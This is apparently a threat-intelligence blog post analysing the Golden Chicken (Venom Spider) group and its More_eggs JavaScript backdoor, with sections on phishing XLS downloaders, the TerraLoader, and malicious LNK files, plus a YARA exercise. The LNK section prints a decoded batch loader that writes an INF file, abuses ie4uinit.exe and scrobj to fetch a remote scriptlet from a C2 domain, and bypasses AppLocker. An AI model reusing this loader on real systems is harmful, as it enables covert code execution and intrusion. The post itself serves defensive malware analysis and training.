Introduction
In this blog, we will delve into the activities of Golden Chicken, also known as Venom Spider, who is responsible for creating the "More_eggs" backdoor. This malware operates under a Malware-as-a-Service (MaaS) architecture, targeting the industrial services industry with the aim of harvesting sensitive information. We will explore their history, recent campaigns, and examine some of the cyber weapons they utilize for espionage.
This research is particularly pertinent given their latest campaign, which uses fake job applicant lures to spread the "More_eggs" malware, as detailed in a report by eSentire
More_eggs Activity Persists Via Fake Job Applicant Lures
Golden Chicken: Who and What Are They?
Golden Chicken, a threat actor behind “More_eggs” backdoor, a JavaScript malware that has been also utilized by other notorious internet crime gangs such as Russian-based FIN6 and Cobalt Group. This malware comes with many names, such as “SpicyOmelette”, “Skid”, and “Terraloader” which varies depending on the threat actors who uses it.
The "More_eggs" JavaScript backdoor was first spotted in the wild in 2018 under the operator “Badbullzvenom”. This sophisticated malware spread through weaponized job listing designed to lure hiring managers and job-seeking professionals. The threat actors crafted fake, infected job offers that, when opened, deployed the "More_eggs" backdoor onto the victims' systems. These deceptive tactics exploited the trust of individuals looking for employment opportunities, making the malware particularly effective in infiltrating corporate networks and harvesting sensitive information.
Golden Chicken: The Smooth Operator
In 2023, the threat actor known as “badbullzvenom,” the mastermind behind the “More_eggs” malware, was claimed to be from Moldova and later given the code name “Jack.” Interestingly, The threat actor is also the owner of a vegetable and fruit import/export business. According to eSentire, Jack's online activities began when he was just 15 years old, as he signed up for various cybercrime forums. Further investigation revealed that “More_eggs” was not Jack’s first project; he had also developed password stealers, crypters, and other malicious tools such as a macros builder named ‘Multiplier’ in 2015 and ‘VenomKit’, which was released in 2017.
Golden Chicken: IOCs and e-Crime Weapons
According to QuoIntelligence, Golden Chicken utilizes "TerraLoader," a multipurpose loader written in PureBasic. TerraLoader typically uses the ".ocx" file extension and is known for employing shortcut files (LNK files) contained within a zip archive. These files are often delivered through links or email attachments. The threat actor exploits legitimate Windows binaries such as "wscript," "cmd," and "ie4unit.exe" to execute malicious commands embedded within the LNK file. Later in this blog, we will analyze some of these Indicators of Compromise (IOCs) as we delve deeper into the topic.
Golden Chicken: e-Crime Weapons Analysis
In this section, we will analyze some of the cyber weapons used by Golden Chicken. We will perform a simple analysis to understand how these tools function during their campaigns, with the help of our threat intelligence community, we have obtained samples such as the malicious XLS files containing macros, the TerraLoader, malicious LNK files and the heavily obfuscated “More_eggs” JavaScript backdoor.
Initial Access: Phishing
These threat actors exploit the weakest point of an organization: its people. They use weaponized emails containing malicious attachments. By performing static analysis on this documents, we can identify unusual strings such as APIs and URLs that a normal document wouldn't contain.
Our indicator that this document requires further investigation is the presence of the "ShellExecuteA()" string, which suggests that the document contains a payload. Using an office analysis tool, we confirmed that a payload is indeed present at this offset.
Our analysis reveals that the malicious XLS file functions as a downloader for TerraLoader.
Initial Access: Loader Analysis
We also obtained the “.ocx” file which is the TerraLoader leverage by Golden Chicken, upon analysis it contains interesting strings such as legitimate company names and also the “libatk-x.dll” string which can be used as IOC for detection.
Upon checking further, it turned out that some sections are packed.
Initial Access: LNK File Analysis
The LNK file acts as a malware loader, it uses native Windows tools to perform its function, here we can see that the absolute path is ‘cmd.exe' which means that it uses cmd to execute the following arguments.
We decode the arguments to know what it does in the system.
Initial Access: Decoding LNK File Script
We decode the arguments to know what it does in the system. The script contains the following functions:
Sets up several environment variables.
Constructs a path to %appdata%\\Microsoft\\ieuinit.inf
.
Writes configuration or script data to this .inf
file.
Copies ie4uinit.exe
from C:\\Windows\\System32\\
to %appdata%\\Microsoft\\
.
Executes ie4uinit.exe
with a specific configuration to be run via wscript
.
Uses ie4uinit.exe to download the configuration from c2 hxxp[://]jamesstepleton[.]com and save the configuration ieuinit.inf
@echo off
setlocal enabledelayedexpansion
:: Set meaningful variables
set "set_command=set"
call set "s=%set_command:~0,1%"
:: Set more variables
set "w=$w"
set "i=i"
set "a=a"
set "t=t"
set "d=d"
set "dot=."
set "init=init"
set "si=si"
set "e=e"
set "settings=settings"
set "inf=.inf"
set "ieuinit_inf=ieuinit.inf"
:: Construct paths
call set "appdata_path=%appdata%\Microsoft\"
call set "full_path=!appdata_path!!ieuinit_inf!"
:: Write data to the file
(for %%t in (
"[version]"
"signature = $windows nt$"
"[destinationdirs]"
"A45E=01"
"[defaultinstall.windows7]"
"UnRegisterOCXs=F07FD"
"selfiles=A45E"
"[F07FD]"
"%11%\scRobj,NI,hhpp:/jamesstepleton.com/firxmyfcjh"
"[A45E]"
"ieuinit.inf"
"[strings]"
"settings=init"
"t=t"
"servicename=' '"
"h=h"
":=:"
"/=/"
"shortsvcname=' '"
"com=com"
"b=b"
) do @echo %%~t)>"!full_path!"
:: Copy and execute the file
call set "exe_name=ie4uinit.exe"
call copy /Y %windir%\system32\!exe_name! "!appdata_path!" > nul
start "" /MIN wmic process call create "!appdata_path!!exe_name! -basesettings"
Defense Evasion: Allowlist Bypass
From the decoded script above, we can see the strings “UnRegisterOCXs=F07FD” and it turned out that this string is associated with Applocker Bypass. AppLocker Bypass – CMSTP
Golden Chicken: Unhatched Egg
Golden Chicken is known for using JavaScript malware. Fortunately, we have obtained an actual heavily obfuscated sample for analysis. Here is the sample script and its structure. As you can see, it includes variable declarations, conditions, and other elements typical of a standard program.
Detection: YARA Rules
To effectively detect and mitigate the threat posed by the "More_eggs" malware, YARA rules can be employed. YARA (Yet Another Recursive Acronym) is a tool used for identifying and classifying malware. By creating specific rules that match patterns found in the "More_eggs" backdoor and its associated files, security professionals can scan systems for these indicators and take appropriate action.
As an exercise create a simple YARA rule with the details from above. Refer to this YARA documentation for guidance, Writing YARA rules — yara 4.4.0 documentation
Carry on Learning with Blue Team Labs Online
Our research into the Golden Chicken threat actor, also known as Venom Spider, has provided valuable insights into their sophisticated operations and techniques. By dissecting the "More_eggs" backdoor and analyzing their use of several initial access files and also the “More_eggs” JavaScript malware, we have uncovered the intricate methods they employ to infiltrate targets and harvest sensitive information.
To see how the Golden Chicken group infiltrates their target network, we have prepared a lab called "Golden Chicken" on our platform, Blue Team Labs Online. This lab relates to this blog and provides hands-on experience with statically analyzing their e-crime weapons and TTPs. You will learn how their tactics work and gain the knowledge needed to detect them in real-world scenarios.
References
More_eggs Malware Disguised as Resumes Targets Recruiters in Phishing Attack
More_eggs Activity Persists Via Fake Job Applicant Lures
GOLDEN CHICKENS: Evolution of the MaaS